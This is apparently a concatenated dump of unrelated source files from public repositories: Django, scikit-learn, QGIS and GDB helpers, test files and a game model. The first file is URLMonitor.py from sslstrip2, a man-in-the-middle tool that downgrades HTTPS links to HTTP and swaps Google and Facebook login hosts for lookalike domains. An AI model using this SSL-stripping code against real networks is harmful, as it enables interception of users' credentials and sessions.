inscriptionweb/sslstrip2
|
refs/heads/master
|
sslstrip/URLMonitor.py
|
20
|
# URLMonitor
import re
import logging
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
    javascriptTrickery = [re.compile(r"http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
    sustitucion = {}  # LEO: host / substitution dictionary
    real = {}  # LEO: host / real dictionary
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/wwww.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
        self.faviconSpoofing = False
self.sustitucion["mail.google.com"] = "gmail.google.com"
self.real["gmail.google.com"] = "mail.google.com"
self.sustitucion["www.facebook.com"] = "social.facebook.com"
self.real["social.facebook.com"] = "www.facebook.com"
self.sustitucion["accounts.google.com"] = "cuentas.google.com"
self.real["cuentas.google.com"] = "accounts.google.com"
self.sustitucion["accounts.google.es"] = "cuentas.google.es"
self.real["cuentas.google.es"] = "accounts.google.es"
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
logging.debug("JavaScript trickery!")
return True
if (client, url) in self.strippedURLs:
logging.debug("(%s, %s) in strippedURLs" % (client, url))
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
        if pathIndex == -1:
pathIndex = len(url)
url += "/"
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
            # Read the port before truncating the host, otherwise the port is always lost.
            port = host[portIndex+1:]
            host = host[0:portIndex]
if len(port) == 0:
port = 443
        # LEO: substitute HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)
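# Illustrative usage sketch, not part of the original module. The client address and URL
# below are made up; the substitution table is the one populated in __init__ above.
if __name__ == '__main__':
    monitor = URLMonitor.getInstance()
    # An HTTPS URL is remembered as stripped and returned with its tokenized host.
    stripped = monitor.addSecureLink('10.0.0.5', 'https://accounts.google.com/login')
    print(stripped)  # -> http://cuentas.google.com/login
    # The stripped (client, url) pair is now treated as secure.
    print(monitor.isSecureLink('10.0.0.5', 'http://accounts.google.com/login'))  # -> True
    # The tokenized host can be mapped back to the real one.
    print(monitor.URLgetRealHost('cuentas.google.com'))  # -> accounts.google.com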
|
jfpla/odoo
|
refs/heads/8.0
|
openerp/addons/test_exceptions/__openerp__.py
|
435
|
# -*- coding: utf-8 -*-
{
'name': 'test-exceptions',
'version': '0.1',
'category': 'Tests',
'description': """A module to generate exceptions.""",
'author': 'OpenERP SA',
'maintainer': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base'],
'data': ['view.xml', 'ir.model.access.csv'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
alex-march/micropython
|
refs/heads/master
|
tests/bench/var-7-instance-meth.py
|
102
|
import bench
class Foo:
def __init__(self):
self._num = 20000000
def num(self):
return self._num
def test(num):
o = Foo()
i = 0
while i < o.num():
i += 1
bench.run(test)
|
AloneRoad/Inforlearn
|
refs/heads/1.0-rc3
|
django/core/management/color.py
|
26
|
"""
Sets up the terminal color scheme.
"""
import sys
from django.utils import termcolors
def supports_color():
"""
Returns True if the running system's terminal supports color, and False
otherwise.
"""
unsupported_platform = (sys.platform in ('win32', 'Pocket PC'))
# isatty is not always implemented, #6223.
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if unsupported_platform or not is_a_tty:
return False
return True
def color_style():
"""Returns a Style object with the Django color scheme."""
if not supports_color():
return no_style()
class dummy: pass
style = dummy()
style.ERROR = termcolors.make_style(fg='red', opts=('bold',))
style.ERROR_OUTPUT = termcolors.make_style(fg='red', opts=('bold',))
style.NOTICE = termcolors.make_style(fg='red')
style.SQL_FIELD = termcolors.make_style(fg='green', opts=('bold',))
style.SQL_COLTYPE = termcolors.make_style(fg='green')
style.SQL_KEYWORD = termcolors.make_style(fg='yellow')
style.SQL_TABLE = termcolors.make_style(opts=('bold',))
return style
def no_style():
"""Returns a Style object that has no colors."""
class dummy:
def __getattr__(self, attr):
return lambda x: x
return dummy()
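# Illustrative usage sketch, not part of the original module: each attribute of the object
# returned by color_style() is a callable produced by termcolors.make_style(), while
# no_style() returns callables that pass text through unchanged.
#
#     style = color_style()
#     print(style.ERROR("Something went wrong"))   # red, bold when colour is supported
#     print(no_style().SQL_KEYWORD("SELECT"))      # always plain "SELECT"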
|
DataDog/integrations-extras
|
refs/heads/master
|
open_policy_agent/datadog_checks/__init__.py
|
42
|
__path__ = __import__('pkgutil').extend_path(__path__, __name__) # type: ignore
|
wtmmac/p2pool
|
refs/heads/master
|
p2pool/test/util/test_pack.py
|
283
|
import unittest
from p2pool.util import pack
class Test(unittest.TestCase):
def test_VarInt(self):
t = pack.VarIntType()
for i in xrange(2**20):
assert t.unpack(t.pack(i)) == i
for i in xrange(2**36, 2**36+25):
assert t.unpack(t.pack(i)) == i
|
vvv1559/intellij-community
|
refs/heads/master
|
python/testData/codeInsight/controlflow/assertfalseargument.py
|
83
|
assert False, 'foo'
print('unreachable 1')
assert False, f()
print('unreachable 2')
|
jtamiace/fle-home
|
refs/heads/master
|
fle_site/apps/redirects/migrations/0003_auto__add_field_redirectlogentry_url.py
|
4
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'RedirectLogEntry.url'
db.add_column(u'redirects_redirectlogentry', 'url',
self.gf('django.db.models.fields.URLField')(default='', max_length=200, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'RedirectLogEntry.url'
db.delete_column(u'redirects_redirectlogentry', 'url')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'redirects.redirectlogentry': {
'Meta': {'object_name': 'RedirectLogEntry'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'referer': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['redirects.RedirectRule']"}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'user_agent': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
u'redirects.redirectrule': {
'Meta': {'object_name': 'RedirectRule'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'override': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'redirects.redirectvariable': {
'Meta': {'object_name': 'RedirectVariable'},
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '150'})
}
}
complete_apps = ['redirects']
|
hdmetor/scikit-learn
|
refs/heads/master
|
sklearn/decomposition/truncated_svd.py
|
199
|
"""Truncated SVD for sparse matrices, aka latent semantic analysis (LSA).
"""
# Author: Lars Buitinck <[email protected]>
# Olivier Grisel <[email protected]>
# Michael Becker <[email protected]>
# License: 3-clause BSD.
import numpy as np
import scipy.sparse as sp
try:
from scipy.sparse.linalg import svds
except ImportError:
from ..utils.arpack import svds
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array, as_float_array, check_random_state
from ..utils.extmath import randomized_svd, safe_sparse_dot, svd_flip
from ..utils.sparsefuncs import mean_variance_axis
__all__ = ["TruncatedSVD"]
class TruncatedSVD(BaseEstimator, TransformerMixin):
"""Dimensionality reduction using truncated SVD (aka LSA).
This transformer performs linear dimensionality reduction by means of
truncated singular value decomposition (SVD). It is very similar to PCA,
but operates on sample vectors directly, instead of on a covariance matrix.
This means it can work with scipy.sparse matrices efficiently.
In particular, truncated SVD works on term count/tf-idf matrices as
returned by the vectorizers in sklearn.feature_extraction.text. In that
context, it is known as latent semantic analysis (LSA).
    This estimator supports two algorithms: a fast randomized SVD solver, and
a "naive" algorithm that uses ARPACK as an eigensolver on (X * X.T) or
(X.T * X), whichever is more efficient.
Read more in the :ref:`User Guide <LSA>`.
Parameters
----------
n_components : int, default = 2
Desired dimensionality of output data.
Must be strictly less than the number of features.
The default value is useful for visualisation. For LSA, a value of
100 is recommended.
algorithm : string, default = "randomized"
SVD solver to use. Either "arpack" for the ARPACK wrapper in SciPy
(scipy.sparse.linalg.svds), or "randomized" for the randomized
algorithm due to Halko (2009).
n_iter : int, optional
Number of iterations for randomized SVD solver. Not used by ARPACK.
random_state : int or RandomState, optional
(Seed for) pseudo-random number generator. If not given, the
numpy.random singleton is used.
tol : float, optional
Tolerance for ARPACK. 0 means machine precision. Ignored by randomized
SVD solver.
Attributes
----------
components_ : array, shape (n_components, n_features)
explained_variance_ratio_ : array, [n_components]
Percentage of variance explained by each of the selected components.
explained_variance_ : array, [n_components]
The variance of the training samples transformed by a projection to
each component.
Examples
--------
>>> from sklearn.decomposition import TruncatedSVD
>>> from sklearn.random_projection import sparse_random_matrix
>>> X = sparse_random_matrix(100, 100, density=0.01, random_state=42)
>>> svd = TruncatedSVD(n_components=5, random_state=42)
>>> svd.fit(X) # doctest: +NORMALIZE_WHITESPACE
TruncatedSVD(algorithm='randomized', n_components=5, n_iter=5,
random_state=42, tol=0.0)
>>> print(svd.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.07825... 0.05528... 0.05445... 0.04997... 0.04134...]
>>> print(svd.explained_variance_ratio_.sum()) # doctest: +ELLIPSIS
0.27930...
See also
--------
PCA
RandomizedPCA
References
----------
Finding structure with randomness: Stochastic algorithms for constructing
approximate matrix decompositions
    Halko, et al., 2009 (arXiv:0909.4061) http://arxiv.org/pdf/0909.4061
Notes
-----
    SVD suffers from a problem called "sign indeterminacy", which means the
sign of the ``components_`` and the output from transform depend on the
algorithm and random state. To work around this, fit instances of this
class to data once, then keep the instance around to do transformations.
"""
def __init__(self, n_components=2, algorithm="randomized", n_iter=5,
random_state=None, tol=0.):
self.algorithm = algorithm
self.n_components = n_components
self.n_iter = n_iter
self.random_state = random_state
self.tol = tol
def fit(self, X, y=None):
"""Fit LSI model on training data X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
Returns
-------
self : object
Returns the transformer object.
"""
self.fit_transform(X)
return self
def fit_transform(self, X, y=None):
"""Fit LSI model to X and perform dimensionality reduction on X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
Returns
-------
X_new : array, shape (n_samples, n_components)
Reduced version of X. This will always be a dense array.
"""
X = as_float_array(X, copy=False)
random_state = check_random_state(self.random_state)
# If sparse and not csr or csc, convert to csr
if sp.issparse(X) and X.getformat() not in ["csr", "csc"]:
X = X.tocsr()
if self.algorithm == "arpack":
U, Sigma, VT = svds(X, k=self.n_components, tol=self.tol)
# svds doesn't abide by scipy.linalg.svd/randomized_svd
# conventions, so reverse its outputs.
Sigma = Sigma[::-1]
U, VT = svd_flip(U[:, ::-1], VT[::-1])
elif self.algorithm == "randomized":
k = self.n_components
n_features = X.shape[1]
if k >= n_features:
raise ValueError("n_components must be < n_features;"
" got %d >= %d" % (k, n_features))
U, Sigma, VT = randomized_svd(X, self.n_components,
n_iter=self.n_iter,
random_state=random_state)
else:
raise ValueError("unknown algorithm %r" % self.algorithm)
self.components_ = VT
# Calculate explained variance & explained variance ratio
X_transformed = np.dot(U, np.diag(Sigma))
self.explained_variance_ = exp_var = np.var(X_transformed, axis=0)
if sp.issparse(X):
_, full_var = mean_variance_axis(X, axis=0)
full_var = full_var.sum()
else:
full_var = np.var(X, axis=0).sum()
self.explained_variance_ratio_ = exp_var / full_var
return X_transformed
def transform(self, X):
"""Perform dimensionality reduction on X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
New data.
Returns
-------
X_new : array, shape (n_samples, n_components)
Reduced version of X. This will always be a dense array.
"""
X = check_array(X, accept_sparse='csr')
return safe_sparse_dot(X, self.components_.T)
def inverse_transform(self, X):
"""Transform X back to its original space.
Returns an array X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data.
Returns
-------
X_original : array, shape (n_samples, n_features)
Note that this is always a dense array.
"""
X = check_array(X)
return np.dot(X, self.components_)
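# Illustrative LSA sketch, not part of this module: combining a tf-idf vectorizer with
# TruncatedSVD as described in the class docstring. The corpus and n_components below are
# made up for demonstration only.
#
#     from sklearn.feature_extraction.text import TfidfVectorizer
#     from sklearn.decomposition import TruncatedSVD
#
#     docs = ["the cat sat", "the dog sat", "cats and dogs play"]
#     X = TfidfVectorizer().fit_transform(docs)   # sparse (n_samples, n_features) matrix
#     lsa = TruncatedSVD(n_components=2, random_state=0)
#     X_topics = lsa.fit_transform(X)             # dense (n_samples, 2) array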
|
zenoss/Community-Zenpacks
|
refs/heads/master
|
ZenPacks.chudler.GoogleAppEngine/ZenPacks/chudler/GoogleAppEngine/migrate/__init__.py
|
1165
|
# __init__.py
|
jordotech/sherri_satchmo
|
refs/heads/master
|
satchmo/apps/shipping/modules/tieredweight/config.py
|
12
|
import logging
from django.utils.translation import ugettext_lazy as _
from livesettings import *
log = logging.getLogger('tieredweight.config')
from shipping.config import SHIPPING_ACTIVE
SHIPPING_ACTIVE.add_choice(('shipping.modules.tieredweight', _('Tiered Weight Shipping')))
log.debug('loaded')
|
boundlessgeo/QGIS
|
refs/heads/master
|
tests/src/python/test_qgsfeature.py
|
7
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsFeature.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Germán Carrillo'
__date__ = '06/10/2012'
__copyright__ = 'Copyright 2012, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
import os
from qgis.core import (QgsFeature,
QgsPoint,
QgsGeometry,
QgsPointXY,
QgsVectorLayer,
NULL,
QgsFields,
QgsField)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
start_app()
class TestQgsFeature(unittest.TestCase):
def test_CreateFeature(self):
feat = QgsFeature()
feat.initAttributes(1)
feat.setAttribute(0, "text")
feat.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(123, 456)))
myId = feat.id()
myExpectedId = 0
myMessage = '\nExpected: %s\nGot: %s' % (myExpectedId, myId)
assert myId == myExpectedId, myMessage
def test_ValidFeature(self):
myPath = os.path.join(unitTestDataPath(), 'points.shp')
myLayer = QgsVectorLayer(myPath, 'Points', 'ogr')
provider = myLayer.dataProvider()
fit = provider.getFeatures()
feat = QgsFeature()
fit.nextFeature(feat)
fit.close()
myValidValue = feat.isValid()
myMessage = '\nExpected: %s\nGot: %s' % ("True", myValidValue)
assert myValidValue, myMessage
def test_Validity(self):
f = QgsFeature()
self.assertFalse(f.isValid())
f.setGeometry(QgsGeometry())
self.assertTrue(f.isValid())
f.setValid(False)
self.assertFalse(f.isValid())
fields = QgsFields()
field1 = QgsField('my_field')
fields.append(field1)
field2 = QgsField('my_field2')
fields.append(field2)
f.setFields(fields)
f.setAttribute(0, 0)
self.assertTrue(f.isValid())
f.setValid(False)
self.assertFalse(f.isValid())
f.setId(27)
self.assertTrue(f.isValid())
def test_Attributes(self):
myPath = os.path.join(unitTestDataPath(), 'lines.shp')
myLayer = QgsVectorLayer(myPath, 'Lines', 'ogr')
provider = myLayer.dataProvider()
fit = provider.getFeatures()
feat = QgsFeature()
fit.nextFeature(feat)
fit.close()
myAttributes = feat.attributes()
        myExpectedAttributes = ["Highway", 1]
myMessage = '\nExpected: %s\nGot: %s' % (
myExpectedAttributes,
myAttributes
)
assert myAttributes == myExpectedAttributes, myMessage
def test_SetAttributes(self):
feat = QgsFeature()
feat.initAttributes(1)
feat.setAttributes([0])
feat.setAttributes([NULL])
assert [NULL] == feat.attributes()
def test_setAttribute(self):
feat = QgsFeature()
feat.initAttributes(1)
with self.assertRaises(KeyError):
feat.setAttribute(-1, 5)
with self.assertRaises(KeyError):
feat.setAttribute(10, 5)
self.assertTrue(feat.setAttribute(0, 5))
def test_DeleteAttribute(self):
feat = QgsFeature()
feat.initAttributes(3)
feat[0] = "text1"
feat[1] = "text2"
feat[2] = "text3"
feat.deleteAttribute(1)
myAttrs = [feat[0], feat[1]]
myExpectedAttrs = ["text1", "text3"]
myMessage = '\nExpected: %s\nGot: %s' % (str(myExpectedAttrs), str(myAttrs))
assert myAttrs == myExpectedAttrs, myMessage
def test_DeleteAttributeByName(self):
fields = QgsFields()
field1 = QgsField('my_field')
fields.append(field1)
field2 = QgsField('my_field2')
fields.append(field2)
feat = QgsFeature(fields)
feat.initAttributes(2)
feat[0] = "text1"
feat[1] = "text2"
with self.assertRaises(KeyError):
feat.deleteAttribute('not present')
self.assertTrue(feat.deleteAttribute('my_field'))
self.assertEqual(feat.attributes(), ['text2'])
def test_SetGeometry(self):
feat = QgsFeature()
feat.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(123, 456)))
myGeometry = feat.geometry()
myExpectedGeometry = "!None"
myMessage = '\nExpected: %s\nGot: %s' % (myExpectedGeometry, myGeometry)
assert myGeometry is not None, myMessage
# set from QgsAbstractGeometry
feat.setGeometry(QgsPoint(12, 34))
self.assertEqual(feat.geometry().asWkt(), 'Point (12 34)')
if __name__ == '__main__':
unittest.main()
|
chrisnorman7/game
|
refs/heads/master
|
db/starships.py
|
1
|
"""Provides classes related to starships."""
from datetime import timedelta
from sqlalchemy import Column, Float, String
from attrs_sqlalchemy import attrs_sqlalchemy
from .base import Base, ComponentMixin
from util import percent
from distance import m, ly
message_length = 150
@attrs_sqlalchemy
class WormholeDrive(Base, ComponentMixin):
"""
A wormhole drive.
distance is the maximum length of a wormhole created by this unit.
power is how many units of energy are needed by this unit to keep a
wormhole stable. (subtracted per second)."""
__tablename__ = 'wormhole_drives'
distance = Column(Float, nullable=False, default=2.5 * ly)
power = Column(Float, nullable=False, default=500.0)
@attrs_sqlalchemy
class StarshipDrive(Base, ComponentMixin):
"""
A starship drive.
power is multiplied by thrust to decide how much energy this unit requires.
max_thrust is the maximum acceleration or deceleration for this drive.
thrust is the current thrust of this drive. If it is a positive number,
then it is considered accelerating. If it is negative, then the ship is
considered to be decelerating. If it is None, then the drive is considered
to be off. In the case that it is not None, it is considered a fraction of
max_thrust and should be no greater than 1.0, and no less than -1.0.
"""
__tablename__ = 'starship_drives'
power = Column(Float, nullable=False, default=5.0)
max_thrust = Column(Float, nullable=False, default=100 * m)
thrust = Column(Float, nullable=True)
start_msg = Column(
String(message_length),
nullable=False,
default='You become aware of an increase in background noise as the '
'main drive activates.'
)
stop_msg = Column(
String(message_length),
nullable=False,
default='The sound of the main drive fades to silence.'
)
accelerate_msg = Column(
String(message_length),
nullable=False,
default='You notice the effects of acceleration.'
)
decelerate_msg = Column(
String(message_length),
nullable=False,
default='You notice the effects of deceleration.'
)
change_direction_msg = Column(
String(message_length),
nullable=False,
default='Gravity shifts slightly then returns to normal.'
)
def get_thrust(self):
"""Return the thrust of this drive based on self.thrust and
self.hp. This number should be considered a full thrust value, not a
fraction."""
return (
(self.thrust or 1.0) / (
percent(
self.hp,
self.max_hitpoints
) / 100.0
)
) * self.max_thrust
def start(self, thrust):
"""Start this drive working with the specified thrust."""
self.thrust = thrust
self.save()
self.vehicle.announce_all(self.start_msg)
def stop(self):
"""Stop this drive."""
self.thrust = None
self.save()
self.vehicle.announce_all(self.stop_msg)
def time_to_decelerate(self):
"""Returns a timedelta representing how long it will take this drive to
decelerate its host ship to a full stop."""
return timedelta(seconds=self.vehicle.speed / abs(self.get_thrust()))
def distance_to_decelerate(self):
"""Returns the distance (in units) it will take this drive to
decelerate to a full stop. If the drive is not thrusting, a full
deceleration is assumed."""
# Use abs to prevent infinite loops.
thrust = abs(self.get_thrust() or -1.0)
speed = self.vehicle.speed
distance = 0.0
while speed > 0.0:
distance += speed
speed -= thrust
return distance
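# Illustrative sketch, not part of the original model: the constant-deceleration sum that
# distance_to_decelerate() performs above, written as a standalone helper so the arithmetic
# is easy to follow. The speed and thrust values in the trailing comment are made up.
def _example_distance_to_stop(speed, thrust):
    """Sum the distance covered each second while speed drops by `thrust` per second."""
    distance = 0.0
    while speed > 0.0:
        distance += speed
        speed -= thrust
    return distance
# e.g. _example_distance_to_stop(300.0, 100.0) == 300.0 + 200.0 + 100.0 == 600.0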
|
tulir/maubot
|
refs/heads/master
|
maubot/cli/cliq/__init__.py
|
1
|
from .cliq import command, option
from .validators import SPDXValidator, VersionValidator, PathValidator
|
cupertinomiranda/binutils_new
|
refs/heads/tls_dev
|
gdb/python/lib/gdb/command/type_printers.py
|
40
|
# Type printer commands.
# Copyright (C) 2010-2015 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import copy
import gdb
"""GDB commands for working with type-printers."""
class InfoTypePrinter(gdb.Command):
"""GDB command to list all registered type-printers.
Usage: info type-printers
"""
def __init__ (self):
super(InfoTypePrinter, self).__init__("info type-printers",
gdb.COMMAND_DATA)
def list_type_printers(self, type_printers):
"""Print a list of type printers."""
# A potential enhancement is to provide an option to list printers in
# "lookup order" (i.e. unsorted).
sorted_type_printers = sorted (copy.copy(type_printers),
key = lambda x: x.name)
for printer in sorted_type_printers:
if printer.enabled:
enabled = ''
else:
enabled = " [disabled]"
print (" %s%s" % (printer.name, enabled))
def invoke(self, arg, from_tty):
"""GDB calls this to perform the command."""
sep = ''
for objfile in gdb.objfiles():
if objfile.type_printers:
print ("%sType printers for %s:" % (sep, objfile.filename))
self.list_type_printers(objfile.type_printers)
sep = '\n'
if gdb.current_progspace().type_printers:
print ("%sType printers for program space:" % sep)
self.list_type_printers(gdb.current_progspace().type_printers)
sep = '\n'
if gdb.type_printers:
print ("%sGlobal type printers:" % sep)
self.list_type_printers(gdb.type_printers)
class _EnableOrDisableCommand(gdb.Command):
def __init__(self, setting, name):
super(_EnableOrDisableCommand, self).__init__(name, gdb.COMMAND_DATA)
self.setting = setting
def set_some(self, name, printers):
result = False
for p in printers:
if name == p.name:
p.enabled = self.setting
result = True
return result
def invoke(self, arg, from_tty):
"""GDB calls this to perform the command."""
for name in arg.split():
ok = False
for objfile in gdb.objfiles():
if self.set_some(name, objfile.type_printers):
ok = True
if self.set_some(name, gdb.current_progspace().type_printers):
ok = True
if self.set_some(name, gdb.type_printers):
ok = True
if not ok:
print ("No type printer named '%s'" % name)
def add_some(self, result, word, printers):
for p in printers:
if p.name.startswith(word):
result.append(p.name)
def complete(self, text, word):
result = []
for objfile in gdb.objfiles():
self.add_some(result, word, objfile.type_printers)
self.add_some(result, word, gdb.current_progspace().type_printers)
self.add_some(result, word, gdb.type_printers)
return result
class EnableTypePrinter(_EnableOrDisableCommand):
"""GDB command to enable the specified type printer.
Usage: enable type-printer NAME
NAME is the name of the type-printer.
"""
def __init__(self):
super(EnableTypePrinter, self).__init__(True, "enable type-printer")
class DisableTypePrinter(_EnableOrDisableCommand):
"""GDB command to disable the specified type-printer.
Usage: disable type-printer NAME
NAME is the name of the type-printer.
"""
def __init__(self):
super(DisableTypePrinter, self).__init__(False, "disable type-printer")
InfoTypePrinter()
EnableTypePrinter()
DisableTypePrinter()
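# Illustrative GDB session sketch, not part of the original module; the printer name
# below is made up for demonstration only.
#
#     (gdb) info type-printers
#     Global type printers:
#       std::vector<T>
#     (gdb) disable type-printer std::vector<T>
#     (gdb) enable type-printer std::vector<T>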
|
orymeyer/Flask-Python-GAE-Login-Registration
|
refs/heads/master
|
lib/Werkzeug-0.10.4.dist-info/flask/testsuite/test_apps/config_package_app/__init__.py
|
1257
|
import os
import flask
here = os.path.abspath(os.path.dirname(__file__))
app = flask.Flask(__name__)
|
lunixbochs/fs-uae-gles
|
refs/heads/master
|
launcher/fs_uae_launcher/fsui/wx/image.py
|
1
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import wx
import pkg_resources
class Image:
def __init__(self, name):
package, file = name.split(":", 1)
stream = pkg_resources.resource_stream(package, file)
image = wx.ImageFromStream(stream)
self.bitmap = wx.BitmapFromImage(image)
|
tiankangkan/paper_plane
|
refs/heads/master
|
paper_plane/wsgi.py
|
1
|
"""
WSGI config for test_of_lin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
import sys
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "paper_plane.settings")
os.environ.setdefault("PYTHON_EGG_CACHE", "/tmp/.python-eggs")
project = os.path.dirname(os.path.dirname(__file__))
sys.path.insert(0, project)
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
apark263/tensorflow
|
refs/heads/master
|
tensorflow/contrib/constrained_optimization/python/test_util.py
|
39
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
